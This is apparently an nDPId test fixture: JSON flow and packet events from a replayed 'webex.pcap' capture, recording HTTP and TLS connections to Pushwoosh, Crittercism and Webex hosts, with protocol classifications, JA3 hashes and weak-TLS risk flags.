+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699096,"flow_last_seen":1444570699096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699096,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1444570699096,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699096,"pkt":"ABoRAAACABoRAAABCABFAAA8731AAEAGBawKCAABTi7tW+lsAFBr3TT9AAAAAKACOQhjAgAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1444570699101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAAoA2dAABAGIddOLu1bCggAAQBQ6WyUIssCa900\/lAS\/\/+AggAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699101,"flow_last_seen":1444570699101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699101,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1444570699101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699101,"pkt":"ABoRAAACABoRAAABCABFAAA8ZgxAAEAGjx0KCAABTi7tW+ltAFASyr2MAAAAAKACOQgzhQAAAgQFtAQCCAoATNuAAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1444570699106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699106,"pkt":"ABoRAAACABoRAAABCABFAAAoA2hAABAGIdZOLu1bCggAAQBQ6W3tNUJzEsq9jVAS\/\/+AgQAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAo735AAEAGBb8KCAABTi7tW+lsAFBr3TT+lCLLA1AQOQhHewAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1444570699107,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699107,"pkt":"ABoRAAACABoRAAABCABFAAAoZg1AAEAGjzAKCAABTi7tW+ltAFASyr2N7TVCdFAQOQhHegAA"} 
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699096,"flow_last_seen":1444570699201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1444570699201,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +00849{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1243,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699096,"flow_last_seen":1444570699202,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1444570699202,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/registerDevice","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} 
+00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699101,"flow_last_seen":1444570699212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":334,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570699212,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cp.pushwoosh.com","url":"cp.pushwoosh.com\/json\/1.3\/applicationOpen","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; LG-D855 Build\/KVT49L.A1412087656)"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1251,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699074,"flow_last_seen":1444570699636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1382,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1444570699636,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
+01349{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1259,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1444570699074,"flow_last_seen":1444570699643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":408,"midstream":0,"thread_ts_msec":1444570699643,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"api.crittercism.com","server_names":"*.crittercism.com,crittercism.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"c800cea031c10ffe47e1d72c9264577a","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL Wildcard, CN=*.crittercism.com","fingerprint":"68:8B:FC:77:1E:CA:80:33:0C:A9:0E:29:A6:E4:0D:FC:3A:AE:43:18"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570699916,"flow_last_seen":1444570699916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570699916,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1444570699916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570699916,"pkt":"ABoRAAACABoRAAABCABFAAA8M+lAAEAGPjwKCAABUEpuRIMPAbsBc+gmAAAAAKACOQj74QAAAgQFtAQCCAoATNvPAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1444570699917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoA3lAABAGnsBQSm5ECggAAQG7gw\/+jBfZAXPoJ1AS\/\/9icAAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1444570699917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoM+pAAEAGPk8KCAABUEpuRIMPAbsBc+gn\/owX2lAQOQgpaQAA"} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700561,"flow_last_seen":1444570700561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1444570700561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700561,"pkt":"ABoRAAACABoRAAABCABFAAA8d7ZAAEAG+m4KCAABUEpuRIMRAbsN6aumAAAAAKACOQgrqQAAAgQFtAQCCAoATNwQAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1444570700563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAAoA4lAABAGnrBQSm5ECggAAQG7gxHyFlRZDemrp1AS\/\/9ibgAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700563,"flow_last_seen":1444570700563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700563,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1444570700563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAA8CyVAAEAGZwAKCAABUEpuRIMSAbsmf9c3AAAAAKACOQjnfgAAAgQFtAQCCAoATNwSAAAAAAEDAwY="} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1444570700565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoA4pAABAGnq9QSm5ECggAAQG7gxLZgCjIJn\/XOFAS\/\/9ibQAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAod7dAAEAG+oEKCAABUEpuRIMRAbsN6aun8hZUWlAQOQgpZwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoCyZAAEAGZxMKCAABUEpuRIMSAbsmf9c42YAoyVAQOQgpZgAA"} 
+00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570712008,"flow_last_seen":1444570712008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570712008,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1444570712008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570712008,"pkt":"ABoRAAACABoRAAABCABFAAA8BPxAAEAGfVYKCAABrfMAbtmHAbtwYOR3AAAAAKACOQhFnAAAAgQFtAQCCAoATOCLAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1444570712012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712012,"pkt":"ABoRAAACABoRAAABCABFAAAoA7pAABAGrqyt8wBuCggAAQG72YePnxuIcGDkeFAS\/\/8cJQAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1444570712013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712013,"pkt":"ABoRAAACABoRAAABCABFAAAoBP1AAEAGfWkKCAABrfMAbtmHAbtwYOR4j58biVAQOQjjHQAA"} 
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570713719,"flow_last_seen":1444570713719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570713719,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1444570713719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570713719,"pkt":"ABoRAAACABoRAAABCABFAAA8m55AAEAG1oYKCAABUEpuRIMXAbuTJntGAAAAAKACOQjR\/QAAAgQFtAQCCAoATODYAAAAAAEDAwY="} 
